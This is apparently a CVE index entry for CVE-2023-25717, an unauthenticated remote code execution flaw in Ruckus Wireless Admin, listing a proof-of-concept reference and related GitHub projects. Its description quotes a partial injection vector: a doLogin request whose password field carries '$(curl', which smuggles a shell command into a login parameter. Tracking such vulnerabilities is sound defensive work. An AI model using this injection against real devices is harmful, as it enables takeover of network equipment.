cve/2023/CVE-2023-25717.md

CVE-2023-25717

Description

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

POC

Reference

• https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/

Github

• https://github.com/ARPSyndicate/cvemon
• https://github.com/Ostorlab/KEV
• https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
• https://github.com/netlas-io/netlas-dorks